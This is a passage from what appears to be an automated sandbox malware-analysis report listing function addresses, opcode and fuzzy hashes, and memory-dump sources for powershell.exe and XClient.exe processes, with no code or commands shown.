Opcode ID: e70ee8a271706f69013269ab53892d43c6b7eb1120726627912fbb6c55f7221f
Instruction ID: 0300bf3d6a675f4d1b3cf63f5c0b90a0150b8c990f4f20d50c27dc2c264f1670
Opcode Fuzzy Hash: e70ee8a271706f69013269ab53892d43c6b7eb1120726627912fbb6c55f7221f
Instruction Fuzzy Hash: 9B212B3090CB8C8FDB59DFAC984A7E9BFF0EB96320F04426BD048C7156D674A415CB91

Function 00007FF7BFF940BF Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1619349549.00007FF7BFF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bff90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7a74e19c470378a8391c4073fc2695f5c37d3775d3a043aa502cae7aada96a9
Instruction ID: e2a2633e840bc4cdd5e8341fbfea16911a184830454def146db18fa7588f4b6a
Opcode Fuzzy Hash: b7a74e19c470378a8391c4073fc2695f5c37d3775d3a043aa502cae7aada96a9
Instruction Fuzzy Hash: 9F213B32D0DAC64FE39ADB5C54511B4A3D1EF76712B89C1B9C11DC72EACE14DC444350

Function 00007FF7BFEC33B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1618636827.00007FF7BFEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bfec0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: b174102d53d6c3993df465b888f80fc1bf9e26ba2bd2d27a7c60f6263dc7f669
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: EE01A73010CB0C4FD744EF0CE051AB6B3E0FB95364F10062EE58AC3651DA36E882CB41

Function 00007FF7BFF943FA Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1619349549.00007FF7BFF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bff90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66a5bd6c282bc1438982c0293f57e33558acb91c4d6391a938b3f2df51d9f7c0
Instruction ID: b38cfdd259a698f772e8b72f43d98d7a824d2304d11a78c25323e8d4a7a0df75
Opcode Fuzzy Hash: 66a5bd6c282bc1438982c0293f57e33558acb91c4d6391a938b3f2df51d9f7c0
Instruction Fuzzy Hash: CFF0F032A0C6848FE749EB4CA0414E8B7E0EF2232174140B6E159CB46BDB25EC408760

Non-executed Functions

Function 00007FF7BFEC8BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

N_^7, xrefs: 00007FF7BFEC8C12
N_^4, xrefs: 00007FF7BFEC8BFA
N_^F, xrefs: 00007FF7BFEC8C7A
N_^J, xrefs: 00007FF7BFEC8C8A

Memory Dump Source

Source File: 00000005.00000002.1618636827.00007FF7BFEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bfec0000_powershell.jbxd

Similarity

API ID:
String ID: N_^4$N_^7$N_^F$N_^J
API String ID: 0-3508309026
Opcode ID: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
Instruction ID: ed16c23c0cc16853b162cc7e281ee5625f193c111e71b371f744dcbc05ad0abe
Opcode Fuzzy Hash: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
Instruction Fuzzy Hash: 4E2108B7A089255ED3017FBDFC245D93B40DF942B4B4542B2D398CF543E914709A8AD6

Analysis Process: powershell.exePID: 7608, Parent PID: 7992COMMON

Executed Functions

Function 00007FF7BFFB3FFC Relevance: .8, Instructions: 789COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1772580993.00007FF7BFFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFFB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7bffb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6605775e9a78bfaf210a45d16541f0236d5105e0065b3d7680c6b7560951656f
Instruction ID: c6ce3925f535ceb9add6a3e803548d61da79848d920b74ea54a4589ed03da016
Opcode Fuzzy Hash: 6605775e9a78bfaf210a45d16541f0236d5105e0065b3d7680c6b7560951656f
Instruction Fuzzy Hash: 25324521E0DBC94FE356AB6C48251B4BFE1EF63621B4902FBD19DCB197C918AC06C361

Function 00007FF7BFFB6605 Relevance: .4, Instructions: 429COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1772580993.00007FF7BFFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFFB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7bffb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4af87348a83e66e884643fdf68f67ffd91de70de40dccf0a23faf8cb495ddfb
Instruction ID: abd844f734f6c83598c44ea8ee8f863852565c2246cc5ff5a79bdafbf22bc78c
Opcode Fuzzy Hash: d4af87348a83e66e884643fdf68f67ffd91de70de40dccf0a23faf8cb495ddfb
Instruction Fuzzy Hash: 5BD15731A0DACA4FE755ABAC88155F5BBE1EF16751B4802FEE05DCB083DA14DC05C361

Function 00007FF7BFEE9FA5 Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1771509957.00007FF7BFEE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7bfee0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8d4b38556709e9471f96a8a8f99ccd0209bdb89e20dbf097cd0f50b77037ea1
Instruction ID: 8f1de70afcf4451c466b309e5abfea886317c1486cc3805a23c797136eb2a971
Opcode Fuzzy Hash: d8d4b38556709e9471f96a8a8f99ccd0209bdb89e20dbf097cd0f50b77037ea1
Instruction Fuzzy Hash: 7151E13680DAC60FD702BB6CF8B21E97FA0DF53669B0D41F7C1C88E193ED18545982A6

Function 00007FF7BFEE9750 Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1771509957.00007FF7BFEE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7bfee0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93a6bf970492765af3b6b0ccdf6ec2b49352e15dcc2e66e7fa95e16e9e274030
Instruction ID: 49764081e5f12da619255a98a8deb9a9314752bfa73ec6dce7e5b781a5b6a479
Opcode Fuzzy Hash: 93a6bf970492765af3b6b0ccdf6ec2b49352e15dcc2e66e7fa95e16e9e274030
Instruction Fuzzy Hash: F9411A3190DBC88FD7499B6C9C0A7B8BFE1FB96710F4441AFD04883193CA64A859C782

Function 00007FF7BFDCED40 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1770266672.00007FF7BFDCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFDCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7bfdcd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcbc7c8ebd26dd4716edd3aea9334f7a545809bfd18a6b8481b8f994a35913a3
Instruction ID: 52260a2b10781821d00275e555b770956eb0d5e48ecf0ba15c749e4ecedde42f
Opcode Fuzzy Hash: bcbc7c8ebd26dd4716edd3aea9334f7a545809bfd18a6b8481b8f994a35913a3
Instruction Fuzzy Hash: 2641167040DBC44FE7569F2C98559927FF0EF63220B1906EFD088CB1A7D629A849C7E2

Function 00007FF7BFEEA4BC Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1771509957.00007FF7BFEE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7bfee0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e5420f4417b2261fa92498fb3ad2c1073ed09575054c5e2079236bb14d6cdfe
Instruction ID: e019417e6dcae747b7a16ceb52fdca92d6f29f7ebcc88074da0e45c0aef9859a
Opcode Fuzzy Hash: 4e5420f4417b2261fa92498fb3ad2c1073ed09575054c5e2079236bb14d6cdfe
Instruction Fuzzy Hash: 3D21073090CA4C4FDB59DBAC984A7E67BE0EB97331F04426FD059C3192DA64945BCB91

Function 00007FF7BFFB40BF Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1772580993.00007FF7BFFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFFB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7bffb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ddbd99030ebd1e536013ebf0656dbfdfc8dbf84dcede72ef5eb583599edde43
Instruction ID: c4499aa7c5ad196e23c552478dd032a30744a0838c5fe4eaea4b00cdf7fd9e4c
Opcode Fuzzy Hash: 1ddbd99030ebd1e536013ebf0656dbfdfc8dbf84dcede72ef5eb583599edde43
Instruction Fuzzy Hash: 64214832E0DAC64FE7A6EF5C95501B4B7D2EF62762B8901B9D11DC7197CE28EC008310

Function 00007FF7BFFB43BC Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1772580993.00007FF7BFFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFFB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7bffb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0022e52ef7c3499f87ecd1a0958e37309aa28d0e857c9a34d5f64bee60e9593a
Instruction ID: 2d773f44d03023af8445429d95819df34c050b96db7d82555fb3cb847f0f751c
Opcode Fuzzy Hash: 0022e52ef7c3499f87ecd1a0958e37309aa28d0e857c9a34d5f64bee60e9593a
Instruction Fuzzy Hash: A6112932E0D9C58FD7A5EF6C94505F8BBD1FF12A2178C01BAE52DD749BCA29AC108361

Function 00007FF7BFEE33B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1771509957.00007FF7BFEE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7bfee0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70aa00635f972a6bac396fc46e5d72351287b17824183693041b1918d6b4f3e0
Instruction ID: b89be8f42d6bfc4121184661f2001f3d620a16045af134322cb3c54c0245ab8b
Opcode Fuzzy Hash: 70aa00635f972a6bac396fc46e5d72351287b17824183693041b1918d6b4f3e0
Instruction Fuzzy Hash: AB01A73010CB0C4FD744EF0CE051AB6B7E0FB95364F10052EE58AC3651DA36E882CB41

Non-executed Functions

Function 00007FF7BFEE8BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON

Download Yara Rule

Strings

L_^Y, xrefs: 00007FF7BFEE8CBA
L_^N, xrefs: 00007FF7BFEE8C72
L_^K, xrefs: 00007FF7BFEE8C6A
L_^8, xrefs: 00007FF7BFEE8BF2
L_^?, xrefs: 00007FF7BFEE8C2A
L_^<, xrefs: 00007FF7BFEE8C12
L_^J, xrefs: 00007FF7BFEE8C62
L_^Q, xrefs: 00007FF7BFEE8C8A

Memory Dump Source

Source File: 00000015.00000002.1771509957.00007FF7BFEE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7bfee0000_powershell.jbxd

Similarity

API ID:
String ID: L_^8$L_^<$L_^?$L_^J$L_^K$L_^N$L_^Q$L_^Y
API String ID: 0-1415242001
Opcode ID: 45a3f6213e3658643fbddfc2beb6de89d5f4f8f0d7bf2f7b26b697d1c801ee56
Instruction ID: 9d795024726aa391c58762f4175dc74fda72a7f65c1f7ea785b4a234448987fe
Opcode Fuzzy Hash: 45a3f6213e3658643fbddfc2beb6de89d5f4f8f0d7bf2f7b26b697d1c801ee56
Instruction Fuzzy Hash: FD21D473A049154AC2023BADB8525ED7780DF943B8745A2F3E318CF517DF24A49B8A85

Analysis Process: XClient.exePID: 2068, Parent PID: 3968COMMON

Executed Functions

Function 00007FF7BFEB1329 Relevance: .8, Instructions: 755COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2416166317.00007FF7BFEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff7bfeb0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de77b3c1e7dbde6ae626a060dc34b54a7efb949a4af76edc44b20c1806a2c1fc
Instruction ID: 90a5938d51515f2d0b3e4dfd06908e4d963eaec8f4afa6f9c065130a577d9170
Opcode Fuzzy Hash: de77b3c1e7dbde6ae626a060dc34b54a7efb949a4af76edc44b20c1806a2c1fc
Instruction Fuzzy Hash: E0329430B18A494FE794FB7C84A96B9B7D2FF99750F804679E40EC3297DE28B8418741

Function 00007FF7BFEB1C45 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2416166317.00007FF7BFEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff7bfeb0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24bf5d4f578d635ef0c37f4c7a85231a3f28603d38ab06c18ffca4db7928bb53
Instruction ID: c39b36bc7c08346300729e01da69c8484665b53394687ec1ab0798f9263430c0
Opcode Fuzzy Hash: 24bf5d4f578d635ef0c37f4c7a85231a3f28603d38ab06c18ffca4db7928bb53
Instruction Fuzzy Hash: 96510120A1DAC94FD386AB7C58682B6BFD5DF97265B1802FAF089C7297DD085806C352

Function 00007FF7BFEB0C9E Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2416166317.00007FF7BFEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff7bfeb0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 870210b938beb9203e2be03510096a177497ce8f80c6d1f5edfab93dec7c3d23
Instruction ID: d301fb9bba97e2f18b611173ac945d9de14dfd2e261cd4df3e40f61c5284e576
Opcode Fuzzy Hash: 870210b938beb9203e2be03510096a177497ce8f80c6d1f5edfab93dec7c3d23
Instruction Fuzzy Hash: 8C510821A0DAC60FE796A77C94551B97BE1EF97260B4902FBD08DC7197DC1C7C428352

Function 00007FF7BFEB04E7 Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2416166317.00007FF7BFEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff7bfeb0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f32f6ce862a89e338c08ebad5f5175c9a09ff87f9b3aa5bab97165bc2751b449
Instruction ID: c8a352e6fbc301fde0a6fc4e7c03ede15815a2e1cca39898d463590bc08df370
Opcode Fuzzy Hash: f32f6ce862a89e338c08ebad5f5175c9a09ff87f9b3aa5bab97165bc2751b449
Instruction Fuzzy Hash: 3041D531B1C9494FE384BB7CA46A2F9B7C1EF99375F0446BAE04EC7293DD18A8428745

Function 00007FF7BFEB07D8 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2416166317.00007FF7BFEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff7bfeb0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d62347561aeffd634126149c574d6866e2fe1150f4bb9d4547c59d707f5351e9
Instruction ID: 408bdd4d3dcc6de60af41b7b28c5c1556ae2aaa6107188f2082bcd9b9036921b
Opcode Fuzzy Hash: d62347561aeffd634126149c574d6866e2fe1150f4bb9d4547c59d707f5351e9
Instruction Fuzzy Hash: 7A51E071A4D96A8FD700FF78E0711F93F61AF842A4F8482B1E44D8B28BDE3468458794

Function 00007FF7BFEB0548 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2416166317.00007FF7BFEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff7bfeb0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba3d340afa4b02564676d0786c86cd23d0131344cf19f1277020dbbdfeeddef5
Instruction ID: dd5d92924f5c039bf78a38c87886f4f1d0858194343d7dfdf8ded398390e609f
Opcode Fuzzy Hash: ba3d340afa4b02564676d0786c86cd23d0131344cf19f1277020dbbdfeeddef5
Instruction Fuzzy Hash: 0D319320B1CD494FE788EB6C9459779B6C2EF99261F4406BEF04EC3293DD68AC428741

Function 00007FF7BFEB0B31 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2416166317.00007FF7BFEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff7bfeb0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51041c5d6f31db34f3fbbe94a514532e19d11708338b9752377357f078875bdc
Instruction ID: 2d30103e78504d252359bd5a6797b25df3a104b13f04cda33d26fb42891749c1
Opcode Fuzzy Hash: 51041c5d6f31db34f3fbbe94a514532e19d11708338b9752377357f078875bdc
Instruction Fuzzy Hash: 8A31A520F18D494FE744BBBC58993BDB6D2EF99751F54427AE00DC3293DD18B8418752

Function 00007FF7BFEB09E1 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2416166317.00007FF7BFEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff7bfeb0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 446b375fc11f808129c49bae2970219c9ecea57dcef416f6546a848c4945a4dc
Instruction ID: dd1ab7e86fc2ad39a2f73b9b077586be487623eea55257686e6985b44185180b
Opcode Fuzzy Hash: 446b375fc11f808129c49bae2970219c9ecea57dcef416f6546a848c4945a4dc
Instruction Fuzzy Hash: 5D319231E1895A8FDB44EBACC4A57FDB7A2FF98310F904679D009D7286DE38B8018750

Function 00007FF7BFEB1248 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2416166317.00007FF7BFEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff7bfeb0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 825e84e72432d42941620ef874868beefae1d241e0fd08516d274080e833d591
Instruction ID: fcac9e3c25b9e3d9d1d0e0ca900a64c1329e5de5ba173f95d65dfb1a30ee03c0
Opcode Fuzzy Hash: 825e84e72432d42941620ef874868beefae1d241e0fd08516d274080e833d591
Instruction Fuzzy Hash: 22112E31A1481A8FDB84EB5CC8A51FDBB71FF88211F804235D61AE7296DE306842C790

Function 00007FF7BFEB1E01 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2416166317.00007FF7BFEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff7bfeb0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59d5f3119b20a27e851ee7c59b2065e1550b63d389cb0ff2d30e0e57bbd0cda8
Instruction ID: c8caf513d30f8a1d3dfcbac528b2c42cc75de14219780721a391571c56df1ef8
Opcode Fuzzy Hash: 59d5f3119b20a27e851ee7c59b2065e1550b63d389cb0ff2d30e0e57bbd0cda8
Instruction Fuzzy Hash: C901261190C6C04FE7417B3C6CA45B57FE09FE3661B4806A7F888C71DBED08A94583A2

Analysis Process: XClient.exePID: 5136, Parent PID: 3968COMMON

Executed Functions

Function 00007FF7BFEF1329 Relevance: .8, Instructions: 755COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2496363748.00007FF7BFEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff7bfef0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13609ec4701c236976271a43f6cd8adb2289a7808dc353b40920249c76a019ef
Instruction ID: f45def6ff6e012caf9ce5597b9d26e7d81b8a57c1fcd3fe392e1f2b9d9937180
Opcode Fuzzy Hash: 13609ec4701c236976271a43f6cd8adb2289a7808dc353b40920249c76a019ef
Instruction Fuzzy Hash: 4F329430F28A494FE798FB7C84696B9B7D2FF99754F804579E40EC32D6DE28A8018741

Function 00007FF7BFEF1C45 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2496363748.00007FF7BFEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff7bfef0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60755e0b28bf9e85402e728bf7fe15ebc1bbc4ddee8439e5f87e72ec28f8f901
Instruction ID: 21f6906eab26eb1a42e925361f59c223e6af95d8d5a4fe9ce287cdfb61968784
Opcode Fuzzy Hash: 60755e0b28bf9e85402e728bf7fe15ebc1bbc4ddee8439e5f87e72ec28f8f901
Instruction Fuzzy Hash: 16510120A1DAC94FE786AB7C48642B6BFD1DF97265B5801FAE0CDC7297DD085846C342

Function 00007FF7BFEF0C9E Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2496363748.00007FF7BFEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff7bfef0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 149d1d3d2795e19ed113f40fe26e123788667858f9993593b4eb134920e68c71
Instruction ID: a5bd6f644ff24bd6dec923c16d219ec75bda8c2d9fc73d2c461a7434afa30afb
Opcode Fuzzy Hash: 149d1d3d2795e19ed113f40fe26e123788667858f9993593b4eb134920e68c71
Instruction Fuzzy Hash: 94512721A0DAC60FE396A77C58561B57BE1EF97260B4901FBD08DC71A7DC1DAC438352

Function 00007FF7BFEF04E7 Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2496363748.00007FF7BFEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff7bfef0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3373d630a133420fbb9a7476348af6f997d42b1cd853f85ed27b84169d9acbff
Instruction ID: 841d5c55757933e6e5722a2398b5e9b302f4c1a6a802268075994c7b212e2fef
Opcode Fuzzy Hash: 3373d630a133420fbb9a7476348af6f997d42b1cd853f85ed27b84169d9acbff
Instruction Fuzzy Hash: 6F412931B1CD494FE344BB7CA46A2F9B7D1EF99365F0442BAE04DC7297DD18A8428345

Function 00007FF7BFEF07D8 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2496363748.00007FF7BFEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff7bfef0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3a8cc49f6ed8923b50024b65a4d758f3b7439cdf42a979b178b42b4dff7a80e
Instruction ID: 1f9c1e2619149433470ecfab8de9a9ad2fdf1d2a9b8f07d9a52580a357be5b36
Opcode Fuzzy Hash: b3a8cc49f6ed8923b50024b65a4d758f3b7439cdf42a979b178b42b4dff7a80e
Instruction Fuzzy Hash: 74510775A489669BD740FF7CA0F11F9BFA1AF84274F8486B1E48E8B38BDD3424458744

Function 00007FF7BFEF0548 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2496363748.00007FF7BFEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff7bfef0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55f54b9c71ff98eb4e9aa8be457483ee42cefaffe35055431f1d855c983fe2a5
Instruction ID: a2623609bde71b9de558161a61f2f1710a43a39c21183f8c58cc7ffda2a87880
Opcode Fuzzy Hash: 55f54b9c71ff98eb4e9aa8be457483ee42cefaffe35055431f1d855c983fe2a5
Instruction Fuzzy Hash: 1831A620B18D494FE788AB2C94593B9B7C2EF99351F5406BEE04EC3297DD68AC418741

Function 00007FF7BFEF0B31 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2496363748.00007FF7BFEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff7bfef0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17241ba704d76d91b078cb04561ce683c1593c7b7913b417b291ca65f006744a
Instruction ID: 0febef63ed156978161c003b6b6e33ba032ead6d4231fedac24321f9855d95a6
Opcode Fuzzy Hash: 17241ba704d76d91b078cb04561ce683c1593c7b7913b417b291ca65f006744a
Instruction Fuzzy Hash: 3231C320F18D464BE744BBBC98593F9B6D1EF99750F84427AE40DC3293DE28B8418752

Function 00007FF7BFEF09E1 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2496363748.00007FF7BFEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff7bfef0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a95d4d1070a04aa9179e87bac73eb482b9f63056433d006c1778f51a9cb4f0e
Instruction ID: 12991e2dc2bd9a2aa6803bb8cb09d093091b2f4d73ff33758bf74382e0d6f688
Opcode Fuzzy Hash: 7a95d4d1070a04aa9179e87bac73eb482b9f63056433d006c1778f51a9cb4f0e
Instruction Fuzzy Hash: 6A319331E1895A8FDB84EF68C4A57FDB7E1FF98310F904675D109D7286DE38A8418B50

Function 00007FF7BFEF1248 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2496363748.00007FF7BFEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff7bfef0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30a2b10a8697b71bf4c35796b941fb5742fac4fbbe0c013dacecd11c3aa12473
Instruction ID: bde5881b7acd5cffbad541f649245f5fe5c1c20685aa23cf9a2375739b310191
Opcode Fuzzy Hash: 30a2b10a8697b71bf4c35796b941fb5742fac4fbbe0c013dacecd11c3aa12473
Instruction Fuzzy Hash: 56114F35A1481A8FDB84EB5CC8A51FDFBB1FF88312F804135D60EE72A6DE3429528790

Function 00007FF7BFEF1E01 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2496363748.00007FF7BFEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff7bfef0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6556517390ed67a43ec549caadbfb40ee25d57b0852f13b47d8711bb70da7d5
